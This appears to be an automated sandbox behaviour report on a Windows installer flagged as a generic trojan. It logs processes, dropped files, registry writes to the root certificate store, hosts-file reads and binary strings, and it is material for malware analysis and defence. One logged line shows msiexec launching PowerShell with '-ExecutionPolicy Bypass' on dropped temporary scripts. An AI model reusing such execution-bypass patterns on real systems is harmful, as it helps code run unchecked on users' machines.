                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss77D9.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi77C5.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr77D6.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr77D7.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeFile created: C:\Users\user\AppData\Local\Temp\shi69FA.tmp
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\75b341f10c9579cbe1059d18f6f3b27b\mscorlib.ni.dll
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6576:120:WilError_01
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe String found in binary or memory: ComboBoxListBoxListViewINSERT INTO `` (`Property`, `Order`, `Value`, `Text`,`Binary_`) VALUES (?,?,?,?,?) TEMPORARY` (`Property`, `Order`, `Value`, `Text`) VALUES (?,?,?,?) TEMPORARYSELECT * FROM `%s` WHERE `Property`='%s' AND `Value`='%s'SELECT * FROM `%s` WHERE `Property`='%s'EditSELECT `Message` FROM `Error` WHERE `Error` = %sSELECT `Text` FROM `UIText` WHERE `Key` = '%s'tmpALLUSERS = 1ALLUSERS = 2MSIINSTALLPERUSER = 1AI_PACKAGE_TYPE = "x64"AI_PACKAGE_TYPE = "Intel64"SELECT * FROM `Control` WHERE `Dialog_` = '%s' AND `Control` = '%s'SELECT `Attributes` FROM `Control` WHERE `Dialog_` = '%s' AND `Control` = '%s'$=3WS_BORDERWS_CAPTIONWS_CHILDWS_CHILDWINDOWWS_CLIPCHILDRENWS_CLIPSIBLINGSWS_DISABLEDWS_DLGFRAMEWS_GROUPWS_HSCROLLWS_ICONICWS_SIZEBOXWS_SYSMENUWS_TABSTOPWS_THICKFRAMEWS_VISIBLEWS_VSCROLLWS_MAXIMIZEBOXWS_MAXIMIZEWS_MINIMIZEBOXWS_MINIMIZEWS_OVERLAPPEDWINDOWWS_OVERLAPPEDWS_POPUPWINDOWWS_POPUPWS_TILEDWINDOWWS_TILEDWS_EX_ACCEPTFILESWS_EX_APPWINDOWWS_EX_CLIENTEDGEWS_EX_CONTEXTHELPWS_EX_CONTROLPARENTWS_EX_DLGMODALFRAMEWS_EX_LEFTWS_EX_LEFTSCROLLBARWS_EX_LTRREADINGWS_EX_MDICHILDWS_EX_NOPARENTNOTIFYWS_EX_OVERLAPPEDWINDOWWS_EX_PALETTEWINDOWWS_EX_RTLREADINGWS_EX_STATICEDGEWS_EX_TOOLWINDOWWS_EX_TOPMOSTWS_EX_TRANSPARENTWS_EX_WINDOWEDGEWS_EX_RIGHTSCROLLBARWS_EX_RIGHTWS_EX_LAYEREDWS_EX_NOACTIVATEWS_EX_NOINHERITLAYOUTWS_EX_LAYOUTRTLWS_EX_COMPOSITEDWS_EXAI_TRIAL_MESSAGE_BODYAI_MSM_TRIAL_MESSAGE_BODYAI_APP_FILEAI_README_FILEAI_APP_ARGSAI_RUN_AS_ADMINMsiLogFileLocation[ProgramFilesFolder][LocalAppDataFolder]Programs\[ProgramFiles64Folder][CommonFilesFolder][LocalAppDataFolder]Programs\Common\[CommonFiles64Folder][WindowsFolder][LocalAppDataFolder][SystemFolder][WindowsVolume][ProgramMenuFolder][DesktopFolder][StartupFolder][TemplateFolder][AdminToolsFolder][AI_UserProgramFiles][WindowsVolume]Program Files (x86)\[AI_ProgramFiles][WindowsVolume]Program Files\MIGRATEFindRelatedProductsMigrateFeatureStatesAI_SETMIXINSTLOCATIONAPPDIRAI_RESTORE_LOCATIONSELECT `ActionProperty` FROM `Upgrade`ActionTarget`Action`='SET_APPDIR' OR `Action`='SET_SHORTCUTDIR'CustomActionSET_APPDIRSET_SHORTCUTDIRSHORTCUTDIRProgramMenuFolderAI_SH_INITEDBrowseDlgCancelDlgDiskCostDlgExitDialogMsiRMFilesInUseOutOfDiskDlgOutOfRbDiskDlgDialog_Control_(`Control_` = 'Next' OR `Control_` = 'Install') AND `Event` = 'EndDialog' AND `Argument` = 'Return'ControlEventAI_INSTALLPERUSER = "0"ALLUSERSVersionMsi >= "5.0"2MSIINSTALLPERUSERAI_NEWINSTProductLanguageAI_INTANCE_LOCATIONAI_UPGRADENoLanguageVersionStringInstallLocationAI_REPLACE_PRODUCTSAI_Replaced_Versions_ListAI_Upgrade_Replace_Question_YesBackUp_AI_Upgrade_Question_YesAI_Upgrade_Question_YesAI_Upgrade_Replace_Question_NoBackUp_AI_Upgrade_Question_NoAI_Upgrade_Question_NoYesDELETE FROM `Shortcut` WHERE `Shortcut`.`Directory_`='%s'DELETE FROM `IniFile` WHERE `IniFile`.`Section`='InternetShortcut' AND`IniFile`.`DirProperty`='%s'SELECT * FROM `%s`ShortcutIniFileAI_DESKTOP_SH0AI_STARTMENU_SHAI_QUICKLAUNCH_SHAI_STARTUP_SHAI_SHORTCUTSREGNot Installe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Static PE information: Virtual size of .text is bigger than: 0x100000
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Static file information: File size 7465048 > 1048576
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Static PE information: certificate valid
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x256600
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: wininet.pdb source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.392305462.0000000005953000.00000004.00000020.00020000.00000000.sdmp, shi69FA.tmp.0.dr
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdb source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb| source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr
                  Source: Binary string: wininet.pdbUGP source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.392305462.0000000005953000.00000004.00000020.00020000.00000000.sdmp, shi69FA.tmp.0.dr
                  Source: Binary string: System.ServiceModel.pdb source: powershell.exe, 00000005.00000002.521530251.0000000000937000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI74BB.tmp.1.dr, MSI7331.tmp.1.dr, MSI6AF5.tmp.0.dr
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdb_ source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr
                  Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Code function: 0_2_00BCC230 push ecx; mov dword ptr [esp], ecx 0_2_00BCC231
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Code function: 0_2_00D8097E push ecx; ret 0_2_00D80991
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Code function: 0_2_00CACD60 push ecx; mov dword ptr [esp], 3F800000h 0_2_00CACE96
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Code function: 0_2_00CE1960 SHGetFolderPathW,GetSystemDirectoryW,GetWindowsDirectoryW,GetWindowsDirectoryW,GetModuleFileNameW,SHGetSpecialFolderLocation,__Init_thread_footer,LoadLibraryW,GetProcAddress,SHGetPathFromIDListW,SHGetMalloc, 0_2_00CE1960
                  Source: shi69FA.tmp.0.dr Static PE information: 0x72F9C735 [Sun Feb 16 01:34:45 2031 UTC]
                  Source: shi69FA.tmp.0.dr Static PE information: section name: .wpp_sf
                  Source: shi69FA.tmp.0.dr Static PE information: section name: .didat
                  Source: 5.2.powershell.exe.8f20000.1.raw.unpack, XRails_TextBox.cs High entropy of concatenated method names: 'CNWhYgvD92', 'u09hN3GqgH', 'rxXhD3AIRk', 'NZ0hgjLhDZ', 'mKShdX1EXO', 'knahTZdmUt', 'P2nhOKLa0U', 'H3Ihcyakj2', 'OnFontChanged', 'OnForeColorChanged'
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe File created: C:\Users\user\AppData\Local\Temp\shi69FA.tmp
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\Helper Company LLC\Helper\7z2201-x64.exe
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI73EE.tmp
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI74BB.tmp
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI750A.tmp
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI76F0.tmp
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe File created: C:\Users\user\AppData\Local\Temp\MSI6AF5.tmp
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI745C.tmp
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7331.tmp
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI73EE.tmp
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI74BB.tmp
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI750A.tmp
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI76F0.tmp
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI745C.tmp
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7331.tmp
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B7AB3308D1EA4477BA1480125A6FBDA936490CBB Blob
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
